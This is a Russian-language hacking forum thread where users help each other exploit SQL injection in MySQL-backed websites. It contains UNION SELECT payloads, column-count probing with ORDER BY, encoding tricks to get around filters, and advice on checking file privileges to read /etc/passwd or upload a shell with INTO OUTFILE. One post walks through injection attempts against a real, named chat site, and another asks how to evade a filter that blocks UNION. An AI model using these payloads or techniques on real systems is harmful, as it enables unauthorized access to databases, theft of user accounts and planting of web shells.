Интересна, если нужно выяснить наличие привилегии file_priv - для чтения и записи файлов, к примеру, прочитать /etc/passwd или залить шелл через INTO OUTFILE
мде.. Можно просто попробывать прочитать /etc/passwd если вывод будит то ипривилегии есть,это помоемупроще чем копаться в таблице! Хотя есть разные ситуации.. не буду спорить))
select file_priv from mysql.user. Кажеца так) Не 100%-й вариант з.ы. тупанул..ну мож кому-нить поможет не с начала читал
Да мне не именно таблицу "user_privileges" нужно прочитать, я хочузнат как ваабще их чиать над!! я просто незнаю и ещо учусь!
GOGA075, Не пойму вопроса, как читать из таблицы есть в мануалах по sql, советую прочитать, чтоб понимать что такое sql-inj в принципе, а не бездумно подставлять по шаблону. А вообще конструкция такая: Где * - колонки из таблицы table, в которых существует value. Ну это один из вариантов..
ну как, вот знаешь ты названия http://site.ru/index.php?id=-1+union+select+1,2,name_of_column,4,5+from+users+limit+1,1/* вот те запрос, де name_of_column название столбца типа username или id, pwd , from+users это откуда, из какой таблицы, лимит это последовательный вывод, вообще читай статью нуля
GOGA075 Вместо name_of_column нужен твой, существующий столбец, Sharingan всё тебе написал.Но и с имеющимся столбцом может не работать , всё зависит от базы,прав доступа фильтрации и т.д.Всё в статьях на форуме
Goga075 Смотря какая база , запросы и методы будут разными.Если дашь ссылку , то тебе его найдут , но как ты думаешь зачем люди пишут статьи, а другие люди их читают? Если сейчас тебе дадут готовый запрос по выводу аккаунта,завтра ты опять в этой теме будешь писать те-же вопросы.
POST /index.php?action=esearch&lang=en HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.site.com Content-Length: 168 Cookie: PHPSESSID=065ad9c95bdbd658b23dc7305f91b803 Connection: Close Pragma: no-cache [email protected]&[email protected]&b_day=-1+union+select+1,2,3,4,5,6,7,8,9&b_month=none&b_year=none&city=none&field=none&grupp=none Почему при таком POST запросе выдаётся Unknown table 'g' in order clause ?. Я ж бля не выбираю таблицы вообще. ордер бай выдаёт ошибку,груп бай при 9 выдаёт боле менее) При order by такая ошибка : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY g.grupp_id, s.city, s.lname' at line 16 Де тут ошибка в синтаксисе ниипу вапще При запросе -1+group+by+9 выдаёт нормальную страницу( знач кол-во столбцов подобрано правильно).
2велемир блин такой мастер ставить вопросы такой злой пост прям ппц не че не понятно по крайней мере из того что я тут понял в конец запроса добавь /* либо пробелы через /../ или просто пробелы поставь !а в идела был бы url было бо проше
иногда приходится пользоваться hex unhex чтобы получить версию бд в скуле. какие есть еще варианты шифрования? или стоит всегда пользоваться hex? знаю еще compress,uncompress,aes_cr
bag Это не обход шифрования hex:unhex используют при проблемах с кодировкой. Для этих-же целей используют ещё aes_decrypt:aes_encrypt или cast(_строка_+as+binary) Эти функции преобразуют строку в нужную кодировку.Например aes_encrypt шифрует строку с заданным ключом, а aes_decrypt дешифрует, на выходе получается результат в "правильной" кодировке.То-же самое делает пара hex:unhex только другим алгоритмом
Так... Теперь я Попросили понюхать чат, но тута такая интересная скуля что разгодать её уже самому интересно... Есть вот такая вот штука _http://chat.besedka.com.ua/cgi-bin/info/user_info.cgi?nick=ALiN4iK!!!&action=view пробуем http://chat.besedka.com.ua/cgi-bin/info/user_info.cgi?nick=ALiN4iK!!!'&action=view ошибка. Пробуем _http://chat.besedka.com.ua/cgi-bin/info/user_info.cgi?nick=ALiN4iK!!!'+ORDER+BY+1/*&action=view Катит. Пробуем http://chat.besedka.com.ua/cgi-bin/info/user_info.cgi?nick=ALiN4iK!!!'+ORDER+BY+2/*&action=view не катит, тоесть 1 колонка... Пробуем _http://chat.besedka.com.ua/cgi-bin/info/user_info.cgi?nick='+UNION+SELECT+1/*&action=view Грит у юзверя нет инфы, пробуем http://chat.besedka.com.ua/cgi-bin/info/user_info.cgi?nick='+UNION+SELECT+2/*&action=view Выводит нам кого-то, тоесть это ID юзверя, значит у нас есть запрос ... WHERE ID = 2 надо WHERE ID = 2+ORDER+BY+3/* (заранее скажу что там 3 колонки) Делаем _http://chat.besedka.com.ua/cgi-bin/info/user_info.cgi?nick='+UNION+SELECT+'2+ORDER+BY+3/*'/*&action=view Работает, делаем UNION+SELECT+1,2,3/* _http://chat.besedka.com.ua/cgi-bin/info/user_info.cgi?nick='+UNION+SELECT+'2+UNION+SELECT+1,2,3/*'/*&action=view Ошибка Помогите разобраться
Ponchik, тут все просто, переменная nick имеет ограничение на длину (максимум 32 символа) все остальное просто обрубается и не идет в sql запрос, что и вызывает ошибку Также скорее всего есть какая то фильтрация или даже проверка на intval описанная в статье Elekt`a правда у него там про php, но и здесь возможно тоже
Нашел скулю. Сначало эта сволочь ругалась на Хрен с ней, перевел в "convert(version() using cp1251)" Теперь выплывает: Колонок 7. Хорошо. Ставлю на 6 и мне выходит: Допираю, что сервер запрещает функцию UNION...Как можно закодировать?
